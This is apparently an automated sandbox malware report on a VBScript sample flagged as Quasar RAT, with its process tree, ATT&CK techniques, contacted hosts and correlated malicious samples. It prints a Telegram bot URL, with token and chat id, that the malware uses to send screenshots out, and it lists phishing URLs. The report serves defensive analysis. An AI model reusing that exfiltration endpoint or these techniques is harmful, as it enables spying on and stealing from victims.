Source: Yara match File source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column in the order the matrix shows them; the digits in front of a technique are the report's signature-count badges, reproduced as shown.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 231 Windows Management Instrumentation; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 221 Scripting; 1 DLL Side-Loading; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 112 Process Injection; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 41 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Hidden Files and Directories
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 141 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Email Collection; 11 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph

Behavior Graph ID: 1612297, Sample: test.vbs, Start date: 11/02/2025, Architecture: WINDOWS, Score: 100

Signatures on the sample: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected Quasar RAT; 7 other signatures
Hosts contacted by the sample: api.telegram.org (Uses the Telegram API (likely for C&C communication)); ipwho.is; api.ipify.org

Process tree:
wscript.exe (started by the sample)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 4 other signatures
  powershell.exe (started by wscript.exe)
    Network: 193.124.205.6, 443, 49793, 49824, AS-REGRU, Russian Federation
    Signatures: Modifies the context of a thread in another process (thread injection); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
    conhost.exe
  cmd.exe (started by wscript.exe)
    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
    powershell.exe (started by cmd.exe)
      Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    conhost.exe
  WmiPrvSE.exe (started by wscript.exe)
    Signature: Creates autostart registry keys with suspicious values (likely registry only malware)
  powershell.exe (started by wscript.exe)
    Network: api.telegram.org 149.154.167.220, 443, 49797, TELEGRAMRU, United Kingdom; ipwho.is 195.201.57.90, 443, 49788, HETZNER-ASDE, Germany; api.ipify.org 172.67.74.152, 443, 49782, CLOUDFLARENETUS, United States
    conhost.exe
mshta.exe (started by the sample)
  powershell.exe (started by mshta.exe)
    conhost.exe
mshta.exe (started by the sample)
  powershell.exe (started by mshta.exe)
    conhost.exe

No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ipwho.isp | 0% | Avira URL Cloud | safe |
http://schemas.datacontract.org/2004/07/Logger | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 195.201.57.90 | true | false | - | high
api.ipify.org | 172.67.74.152 | true | false | - | high
api.telegram.org | 149.154.167.220 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | - | high
https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-4630316859&parse_mode=Markdown | false | - | high
https://ipwho.is/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://ns.adobe.hotosh | powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1386901887.0000027F901DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ipwho.is/SSELECT | powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmp | false | - | high
https://stackoverflow.com/q/14436606/23354 | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-netJ | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ns.a.0/sTy | powershell.exe, 00000006.00000002.1594286288.000001BEFA2C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.datacontract.org | powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1599632881.000001BEFA600000.00000004.08000000.00040000.00000000.sdmp | false | - | high
https://ipwho.isp | powershell.exe, 00000006.00000002.1507861844.000001BEE2644000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.datacontract.org/2004/07/ | powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000005.00000002.1372476794.0000027F81197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3341000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-net | powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2591788897.000002254773D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.datacontract.org/2004/07/Logger | powershell.exe, 00000006.00000002.1507861844.000001BEE26CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE28F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26AC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.ipify.org | powershell.exe, 00000006.00000002.1507861844.000001BEE285E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.ipify.org | powershell.exe, 00000006.00000002.1507861844.000001BEE25DC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-neti | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/mgravell/protobuf-net6 | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://stackoverflow.com/q/11564914/23354; | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://stackoverflow.com/q/2152978/23354 | powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ipwho.is | powershell.exe, 00000006.00000002.1507861844.000001BEE2883000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1386901887.0000027F90081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F81B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE3B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1583652727.000001BEF2163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://api.telegram.org | powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot7813041927:AAFJKTwPluPESj-jsG5TWsi6m7BDKrgz_Rk/sendPhoto?chat_id=-463031 | powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.1372476794.0000027F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE20F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.0000022547481000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.v | powershell.exe, 00000006.00000002.1592989522.000001BEFA143000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://ipwho.is | powershell.exe, 00000006.00000002.1507861844.000001BEE2899000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.124.205.6 | unknown | Russian Federation | 197695 | AS-REGRU | true
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1612297
Start date and time: 2025-02-11 17:31:27 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: test.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@21/14@3/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 46
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:32:29 | API Interceptor | 3526877x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | https://doxnero.sg-azure.top/ | malicious | Unknown | -
149.154.167.220 | Air Waybill NO 6979374150 280120289500169465-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Paypal_Log_Activity_09283.scr.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | https://obnica-sdksdlsdfs-projects.vercel.app/files.html | malicious | Unknown | -
149.154.167.220 | Remittance Advice Copy.exe | malicious | Snake Keylogger | -
149.154.167.220 | facturas gastos.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | QUOTE-TM-2025-8489.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | DEKONT(35KB).pdf.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | HSBC SLIP.exe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | Factura proforma.exe | malicious | GuLoader, Snake Keylogger | -
172.67.74.152 | Setup.exe | malicious | Unknown | api.ipify.org/?format=xml
172.67.74.152 | jgbC220X2U.exe | malicious | Unknown | api.ipify.org/?format=text
172.67.74.152 | malware.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
172.67.74.152 | Simple1.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | Simple2.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | systemConfigChecker.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | systemConfigChecker.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | Zc9eO57fgF.elf | malicious | Unknown | api.ipify.org/
172.67.74.152 | 67065b4c84713_Javiles.exe | malicious | RDPWrap Tool | api.ipify.org/
195.201.57.90 | sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | Flash_USDT_Sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | Flash_USDT_Sender.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | SPt4FUjZMt.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLine | /?output=json
195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | 765iYbgWn9.exe | malicious | Luca Stealer | /?output=json
195.201.57.90 | WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | /?output=json
195.201.57.90 | ubes6SC7Vd.exe | malicious | Unknown | ipwhois.app/xml/
195.201.57.90 | cOQD62FceM.exe | malicious | Luca Stealer, Rusty Stealer | /?output=json
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ipwho.is | 0LjWxSZsxM.exe | malicious | Quasar | 195.201.57.90
ipwho.is | SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe | malicious | Quasar | 195.201.57.90
ipwho.is | uB4F7gRNPM.exe | malicious | Quasar | 195.201.57.90
ipwho.is | uDF9cf2ziK.exe | malicious | Amadey, RedLine | 195.201.57.90
ipwho.is | rH3TpuMpZn.exe | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, Vidar | 195.201.57.90
ipwho.is | https://howareutoday.com:443/xxxj | malicious | TechSupportScam | 195.201.57.90
ipwho.is | jVxEM7I2hF.exe | malicious | Quasar | 195.201.57.90
ipwho.is | 314e9bbe1e43938595f774fe97f4926c9f169493f9ea6.exe | malicious | Quasar | 195.201.57.90
ipwho.is | http://tessta.pages.dev/Wi0n0ALxerrinf0x0876 | malicious | TechSupportScam | 195.201.57.90
ipwho.is | http://dro.pm/ax | malicious | Quasar
                                                                                                                      • 195.201.57.90
                                                                                                                      api.telegram.orghttps://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Air Waybill NO 6979374150 280120289500169465-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Paypal_Log_Activity_09283.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://obnica-sdksdlsdfs-projects.vercel.app/files.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Remittance Advice Copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      facturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      QUOTE-TM-2025-8489.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEKONT(35KB).pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      HSBC SLIP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Factura proforma.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      api.ipify.orgonlick_photo_downloader.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      https://www.netigate.se/ra/s.aspx?s=1257251X472839856X91309Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      uki9iUoEre.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      payment copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      https://primenode.live/Get hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      rIMG_1160_3079.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      https://www.canva.com/design/DAGevAFBxwg/Bokr_tYsAyC8sQoBqsS-9A/view?utm_content=DAGevAFBxwg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=ha9dfea6f83Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 172.67.74.152
                                                                                                                      https://privitibindmsteringmastodon.glitch.me:443/#amltX2hvd2FyZEBvdXRsb29rLmNvbQGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      EMAILMING BANK PAPER PAYMENT OF USD 8,8867.06.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRU3e#U043d.docGet hashmaliciousEternity StealerBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      https://doxnero.sg-azure.top/Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Air Waybill NO 6979374150 280120289500169465-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Paypal_Log_Activity_09283.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://obnica-sdksdlsdfs-projects.vercel.app/files.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Remittance Advice Copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      21ruAkL7XB.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      facturas gastos.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      QUOTE-TM-2025-8489.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEKONT(35KB).pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      HETZNER-ASDEtOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 168.119.145.117
                                                                                                                      3e#U043d.docGet hashmaliciousEternity StealerBrowse
                                                                                                                      • 5.75.168.247
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                      • 88.198.246.242
                                                                                                                      0LjWxSZsxM.exeGet hashmaliciousQuasarBrowse
                                                                                                                      • 195.201.57.90
                                                                                                                      AS-REGRUcrypt.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      X4pCdhjJCI.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      vmEBHny0Jw.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      1wMow0yFjm.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      fnn6g1xT1Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      QUOTE#230188.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 31.31.196.17
                                                                                                                      Payment slip.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 31.31.196.17
                                                                                                                      Enquiry.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 194.58.112.174
                                                                                                                      CLOUDFLARENETUShttps://click.mailchimp.com/track/click/30010842/forms.office.com?p=eyJzIjoiUU5MTE43blNUdEQxbUdOR3lwdVJ3M1kyVHBzIiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2Zvcm1zLm9mZmljZS5jb21cXFwvUGFnZXNcXFwvU2hhcmVGb3JtUGFnZS5hc3B4P2lkPWkwYWxtWEtzYWtDTnNoUThad2JsWnVHaXRELXJkRk5MbngxZkVDU0RBUGRVT1VWWE9WSTJUa0ZNVFRaSU1EUldUa2RZVmtWSlEwczBVUzR1JnNoYXJldG9rZW49cWhZMVVQRWtyM0NGdjJpcUlpTUtcIixcImlkXCI6XCIzYjUxMDE1ZDY0ODc0ZDdkOWMwNjg2OGM5Y2M5OWVjOFwiLFwidXJsX2lkc1wiOltcIjVkMTg5YTdhMzU1NWIyZWQ5ZjBlNmQ4ZTM3MWFjZmM1ZDE4NzMwYmRcIl19In0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      http://nvidia-release.orgGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      poc.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.19.24
                                                                                                                      https://r.bgroupusportugal.pt/redirect.php?disp=morta_ans11_10-02_20_50000&idc=1&email=uuser@wpb.org&mode=resetPassword&oobCode=fA9TMT-qLiJF54BFl3bAmwEgjXEBn69dwNFjpDzVlzcAAAGU8a8rwg&apiKey=AIzaSyD3eywpo5yGXrXV5Eo__cDlhXtgd0VYeNc&lang=enGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.191.223
                                                                                                                      https://iedfuj.luucco.cl/ijueiu/iujiur/dGVzdEB0ZXN0LmNvbQo=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.40.115
                                                                                                                      file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                                                                      • 172.67.192.39
                                                                                                                      https://employerschoiceonline.instascreen.net/is/app/applicantPortal?referenceNumber=376641Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.249.203
                                                                                                                      https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/9157562603/xCoLsHUiUn/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.16.2.189
                                                                                                                      http://coinlaw.ioGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.16.79.73
                                                                                                                      https://handymanproservices.com/wp-includes/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.21.2.8
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0epoc.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      • 172.67.74.152
                                                                                                                      • 195.201.57.90
                                                                                                                      puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                                                      • 149.154.167.220
